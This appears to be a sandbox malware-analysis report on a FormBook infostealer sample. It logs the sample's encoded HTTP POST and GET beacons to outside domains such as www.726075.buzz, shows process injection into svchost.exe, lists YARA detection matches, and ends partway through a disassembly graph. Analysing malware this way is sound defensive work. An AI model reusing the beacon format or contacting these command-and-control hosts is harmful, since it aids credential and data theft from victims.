                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              48192.168.2.55491965.21.196.9080728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:32:55.363876104 CEST463OUTGET /ivyl/?bX=R3Qz1Cq/YEXK51DnfrEfG6FZDYGRURJsK8S8Pa4nsScgDMDttNnynOTz2BK+/4aKVNhzLsJ6XObNN2Y75FAxAaoazEpO0rybbGrvB+WgGgze1Cytk6YUwSk/iMHlseUc1g==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.070001350.xyz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:32:56.015064955 CEST1032INHTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:32:55 GMT
                              vary: User-Agent
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              49192.168.2.55492047.57.185.22780
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:33:09.561683893 CEST721OUTPOST /w9nd/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Origin: http://www.726075.buzz
                              Referer: http://www.726075.buzz/w9nd/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 77 66 35 71 33 56 58 78 55 59 42 7a 51 68 53 54 35 37 78 4b 66 65 39 54 76 2b 4b 6f 2b 79 57 33 45 57 51 38 55 48 72 31 53 2b 48 79 65 4c 70 4a 31 67 67 49 48 44 62 6d 6a 30 64 45 55 47 59 6b 49 2f 45 6d 49 75 6d 6b 77 77 77 63 61 37 4a 75 5a 32 59 76 2b 53 6b 67 63 4e 57 38 36 32 57 2b 79 42 59 76 65 4c 7a 33 69 42 4b 48 42 66 51 38 6c 6c 58 31 61 2f 38 49 62 65 72 44 68 4e 43 4f 43 76 44 38 4b 65 6b 5a 67 41 7a 52 4b 57 38 30 71 36 70 4c 53 79 79 72 67 68 7a 31 6a 4b 6f 32 54 6e 66 47 77 54 66 62 65 43 51 6a 55 36 74 61 48 4b 39 61 6a 33 4c 55 57 4d 4c 4a 6f 72 32 78 52 4d 73 4a 6c 4d 38 3d
                              Data Ascii: bX=wf5q3VXxUYBzQhST57xKfe9Tv+Ko+yW3EWQ8UHr1S+HyeLpJ1ggIHDbmj0dEUGYkI/EmIumkwwwca7JuZ2Yv+SkgcNW862W+yBYveLz3iBKHBfQ8llX1a/8IberDhNCOCvD8KekZgAzRKW80q6pLSyyrghz1jKo2TnfGwTfbeCQjU6taHK9aj3LUWMLJor2xRMsJlM8=
                              Sep 16, 2024 09:33:10.443836927 CEST302INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:33:10 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              50192.168.2.55492147.57.185.22780
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:33:12.111026049 CEST741OUTPOST /w9nd/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Origin: http://www.726075.buzz
                              Referer: http://www.726075.buzz/w9nd/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 77 66 35 71 33 56 58 78 55 59 42 7a 52 43 4b 54 37 61 78 4b 4f 75 39 51 78 75 4b 6f 70 69 58 38 45 57 63 38 55 44 37 6c 53 4d 6a 79 65 71 31 4a 30 68 67 49 47 44 62 6d 6f 55 64 46 4c 32 59 7a 49 2f 59 59 49 72 65 6b 77 77 6b 63 61 2b 6c 75 61 46 41 75 2b 43 6b 69 51 74 57 36 2b 32 57 2b 79 42 59 76 65 50 62 52 69 41 75 48 42 50 41 38 71 6b 58 30 46 50 38 4c 63 65 72 44 6c 4e 43 4b 43 76 44 4b 4b 62 4e 38 67 45 44 52 4b 57 4d 30 70 72 6f 64 5a 79 7a 42 39 78 79 2b 71 49 4e 2f 53 48 4b 4c 2f 69 6d 66 4f 43 46 63 59 73 41 77 64 6f 31 79 77 58 6e 73 47 66 44 2b 35 62 58 59 4c 76 38 35 37 62 72 56 53 38 53 4c 71 6a 74 68 38 79 76 4b 4b 31 4e 43 2f 66 6a 4c
                              Data Ascii: bX=wf5q3VXxUYBzRCKT7axKOu9QxuKopiX8EWc8UD7lSMjyeq1J0hgIGDbmoUdFL2YzI/YYIrekwwkca+luaFAu+CkiQtW6+2W+yBYvePbRiAuHBPA8qkX0FP8LcerDlNCKCvDKKbN8gEDRKWM0prodZyzB9xy+qIN/SHKL/imfOCFcYsAwdo1ywXnsGfD+5bXYLv857brVS8SLqjth8yvKK1NC/fjL
                              Sep 16, 2024 09:33:13.022877932 CEST302INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:33:12 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              51192.168.2.55492247.57.185.22780
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:33:14.657780886 CEST1758OUTPOST /w9nd/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Origin: http://www.726075.buzz
                              Referer: http://www.726075.buzz/w9nd/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 77 66 35 71 33 56 58 78 55 59 42 7a 52 43 4b 54 37 61 78 4b 4f 75 39 51 78 75 4b 6f 70 69 58 38 45 57 63 38 55 44 37 6c 53 4d 72 79 65 59 39 4a 31 43 49 49 58 7a 62 6d 72 55 64 41 4c 32 5a 78 49 2f 41 55 49 72 43 61 77 7a 63 63 59 59 78 75 66 77 30 75 74 69 6b 69 50 64 57 37 36 32 57 52 79 42 49 7a 65 4c 2f 52 69 41 75 48 42 4e 49 38 74 31 58 30 48 50 38 49 62 65 72 50 68 4e 44 56 43 76 4c 30 4b 62 49 4a 67 31 2f 52 4e 32 63 30 36 70 51 64 62 53 79 6e 38 78 79 74 71 49 78 38 53 47 6e 34 2f 69 53 6c 4f 41 56 63 64 4c 31 74 42 63 35 50 7a 33 44 4d 43 66 69 66 67 72 4c 2b 42 2f 6f 31 33 4d 44 64 4f 4f 47 56 39 6b 56 78 71 41 6e 41 65 67 74 47 37 49 6d 30 49 31 56 56 70 57 37 48 5a 57 35 62 68 4d 71 61 46 70 37 2b 38 74 55 6a 41 63 54 77 61 4c 41 7a 45 62 47 58 53 58 39 44 51 41 37 54 65 46 45 50 47 30 6d 50 4e 41 42 49 45 44 41 7a 74 2b 2f 6d 37 5a 71 32 42 73 4a 75 6e 42 32 4a 34 66 45 78 36 4e 6c 62 39 53 57 4c 79 70 6e 6f 59 30 45 61 7a 75 6b 4f 50 4d 30 41 69 6f 4e 4d 76 58 33 45 6d 75 30 [TRUNCATED]
                              Data Ascii: bX=wf5q3VXxUYBzRCKT7axKOu9QxuKopiX8EWc8UD7lSMryeY9J1CIIXzbmrUdAL2ZxI/AUIrCawzccYYxufw0utikiPdW762WRyBIzeL/RiAuHBNI8t1X0HP8IberPhNDVCvL0KbIJg1/RN2c06pQdbSyn8xytqIx8SGn4/iSlOAVcdL1tBc5Pz3DMCfifgrL+B/o13MDdOOGV9kVxqAnAegtG7Im0I1VVpW7HZW5bhMqaFp7+8tUjAcTwaLAzEbGXSX9DQA7TeFEPG0mPNABIEDAzt+/m7Zq2BsJunB2J4fEx6Nlb9SWLypnoY0EazukOPM0AioNMvX3Emu00PiDD5pULyMNctaxMnKwpD6FG8hRvw9zlEi5mUErL4P5dpewv6I0L7zDbxZ1/X/Pb7XUdJy27Iz4YLyb0TI+cnSvfx68rvKLmo6Bn2N8seJP4X7C9/Uy29UKpm9fFQZYLlSlmlIJMiWJn9xKrQk3ykiKUdFbUYhC5jfNlvoGwnI2UFtPLepnt7jdro+VAd0KCd0qIocFeYKZD+zfnjYf2i4D5wMT7s+rwMsHU+pF3Ed4JwQSCR4XlMgu38xXspfZFDYwX3VIB2Dhtnc5hdf22z5mrfjkZAxAF6abREaJrrlkUwpbZ6GibJw4yyQ92Rg/qVK9iPhgSYt1nyP7JyZjpQ/lKHsNWQKLBHffgSN2KucyvDzkXpKAHZ0epRvALZcaXDrb7HnNSFN8aHdQ5eg1M2qp6F730P+fJCRtnyoWaz9gurseMxdy3v8T7SZuZMYewjzbw605/4daZb/dns3LZb7oRYsHNrzHgmmTvwbc+VgmpgFzJUiMLUWmaIWxGQ3i+AtOUEKE0+Z/QHhI8kXSx8jbbtzhRYdVLsIJo53qsMbm8xr0mcllH2/NSFT+xQSzX6Ru8nd6WxJ/obOfCTi2OT+TWk3+tY/KEw4CGg3DGkYcA49SYksxAaepnl2Ob3HToNRqGF0ykF+CertdRDsh7nA5uGe8oUiZ41 [TRUNCATED]
                              Sep 16, 2024 09:33:15.552326918 CEST302INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:33:15 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              52192.168.2.55492347.57.185.22780
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:33:17.199580908 CEST461OUTGET /w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.726075.buzz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:33:18.095608950 CEST302INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:33:17 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "6663edd0-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              53192.168.2.55492489.58.49.180
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:33:23.123069048 CEST742OUTPOST /xcfw/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Origin: http://www.freepicture.online
                              Referer: http://www.freepicture.online/xcfw/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d
                              Data Ascii: bX=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
                              Sep 16, 2024 09:33:23.749639988 CEST360INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:33:23 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:03:29:01
                              Start date:16/09/2024
                              Path:C:\Users\user\Desktop\PO2-2401-0016 (TR).exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
                              Imagebase:0x150000
                              File size:1'724'416 bytes
                              MD5 hash:6F8E7D082D8C039064CBCC813D24DCB4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:2
                              Start time:03:29:02
                              Start date:16/09/2024
                              Path:C:\Windows\SysWOW64\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
                              Imagebase:0xd10000
                              File size:46'504 bytes
                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:03:29:16
                              Start date:16/09/2024
                              Path:C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe"
                              Imagebase:0x7a0000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:5
                              Start time:03:29:18
                              Start date:16/09/2024
                              Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                              Imagebase:0x8d0000
                              File size:478'720 bytes
                              MD5 hash:6599A09C160036131E4A933168DA245F
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:moderate
                              Has exited:false

                              General

                              Target ID:6
                              Start time:03:29:31
                              Start date:16/09/2024
                              Path:C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe"
                              Imagebase:0x7a0000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:8
                              Start time:03:29:48
                              Start date:16/09/2024
                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                              Imagebase:0x7ff79f9e0000
                              File size:676'768 bytes
                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:2.8%
                                Dynamic/Decrypted Code Coverage:1.1%
                                Signature Coverage:5.5%
                                Total number of Nodes:1664
                                Total number of Limit Nodes:38
                                execution_graph 97025 152e37 97104 15a961 97025->97104 97029 152e6b 97123 153a5a 97029->97123 97031 152e7f 97130 159cb3 97031->97130 97036 152ead 97158 15a8c7 97036->97158 97037 192cb0 97178 1c2cf9 97037->97178 97039 192cc3 97041 192ccf 97039->97041 97204 154f39 97039->97204 97045 154f39 68 API calls 97041->97045 97043 152ec3 97162 156f88 22 API calls 97043->97162 97047 192ce5 97045->97047 97046 152ecf 97048 159cb3 22 API calls 97046->97048 97210 153084 22 API calls 97047->97210 97049 152edc 97048->97049 97163 15a81b 41 API calls 97049->97163 97052 152eec 97054 159cb3 22 API calls 97052->97054 97053 192d02 97211 153084 22 API calls 97053->97211 97055 152f12 97054->97055 97164 15a81b 41 API calls 97055->97164 97058 192d1e 97059 153a5a 24 API calls 97058->97059 97060 192d44 97059->97060 97212 153084 22 API calls 97060->97212 97061 152f21 97064 15a961 22 API calls 97061->97064 97063 192d50 97065 15a8c7 22 API calls 97063->97065 97066 152f3f 97064->97066 97067 192d5e 97065->97067 97165 153084 22 API calls 97066->97165 97213 153084 22 API calls 97067->97213 97070 152f4b 97166 174a28 40 API calls 3 library calls 97070->97166 97071 192d6d 97076 15a8c7 22 API calls 97071->97076 97073 152f59 97073->97047 97074 152f63 97073->97074 97167 174a28 40 API calls 3 library calls 97074->97167 97078 192d83 97076->97078 97077 152f6e 97077->97053 97079 152f78 97077->97079 97214 153084 22 API calls 97078->97214 97168 174a28 40 API calls 3 library calls 97079->97168 97082 192d90 97083 152f83 97083->97058 97084 152f8d 97083->97084 97169 174a28 40 API calls 3 library calls 97084->97169 97086 152f98 97087 